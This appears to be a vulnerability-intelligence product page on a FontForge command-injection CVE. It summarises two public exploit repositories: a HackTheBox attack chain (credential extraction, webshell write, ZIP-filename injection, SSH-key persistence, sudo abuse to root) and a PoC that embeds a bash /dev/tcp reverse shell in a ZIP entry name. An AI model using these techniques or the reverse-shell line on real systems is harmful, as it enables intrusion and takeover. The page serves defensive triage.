FontForge through version 20230101 contains a command-injection vulnerability in Splinefont. Crafted archive or compressed-file inputs can trigger command injection during processing.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (2 hidden).
This repository is primarily a collection of HackTheBox writeups, but it also contains real exploit automation in the `VariaType/` directory. The actionable exploit consists of one Bash orchestrator (`exploit_variatype.sh`) and four Python phase scripts. The exploit is not tied to a common framework like Metasploit; it is custom automation for a multi-stage Linux target compromise. Main exploit capabilities: (1) reconnaissance and extraction of credentials from an exposed `.git` repository on `portal.variatype.htb`; (2) login and LFI verification against `download.php`; (3) preparation of malicious font files and a crafted designspace document to exploit CVE-2025-66034 in fontTools varLib, causing arbitrary file write of a PHP webshell to `/var/www/portal.variatype.htb/public/files/shell.php`; (4) privilege escalation to user `steve` using a ZIP filename command injection payload associated with CVE-2024-25082, which appends an attacker SSH key into `/home/steve/.ssh/authorized_keys`; and (5) privilege escalation to root by abusing `sudo /usr/bin/python3 /opt/font-tools/install_validator.py` with a URL-encoded absolute path traversal to write the attacker’s public key into `/root/.ssh/authorized_keys`. Repository structure: most files are Markdown writeups for HTB machines/challenges. Only 5 files contain exploit code, all under `VariaType/`. `phase1_git_extract.py` handles exposed Git extraction and credential recovery. `phase2_rce_exploit.py` generates malicious font/designspace artifacts for the webshell stage, though upload is partly left manual in that script. `phase3_privesc_steve.py` generates an SSH key, builds an evil ZIP with a filename-based command injection payload, serves it over HTTP, and attempts to place it on the target for later processing. `phase4_privesc_root.py` serves a root public key and invokes the vulnerable validator script over SSH as steve to gain root SSH access. `exploit_variatype.sh` ties the phases together into a mostly automated end-to-end attack. Overall, this is a valid exploit repository with operational code, not just detection logic. The exploit targets a web-exposed Linux application stack and culminates in full root compromise with SSH persistence.
Small standalone PoC repository with 4 files: a Python exploit generator, README, writeup, and license. The main code is exploit.py, which accepts --lhost, --lport, and optional --output, then builds a malicious ZIP archive using Python's zipfile module. The exploit works by placing a command-injection string in the ZIP entry filename, appending a .ttf extension, and writing dummy font content into that entry. The injected command is a base64-wrapped bash reverse shell: it decodes and executes 'bash -i >& /dev/tcp/<lhost>/<lport> 0>&1'. This indicates the exploit's primary capability is remote code execution leading to an interactive reverse shell, assuming a vulnerable FontForge-based processing pipeline interprets the crafted filename unsafely. The repository is not part of a larger exploit framework. It appears to be a basic operational PoC rather than a detection tool. The README describes the target as CVE-2024-25082, while the code docstring, argparse description, and writeup refer to CVE-2024-25081; this inconsistency is notable and suggests either mislabeling or mixed documentation. The writeup provides additional context showing a likely vulnerable Linux processing flow involving /opt/process_client_submissions.bak iterating over /var/www/html/uploads/*.zip and invoking 'fontforge -script /opt/process_font.pe'. Overall purpose: generate a malicious ZIP for delivery to a system that processes uploaded ZIP/font files with FontForge, causing command execution via a crafted filename and returning a shell to the attacker-controlled listener.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
No public activity tracked yet. Mallory keeps watching.
No public activity observed for this vulnerability.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.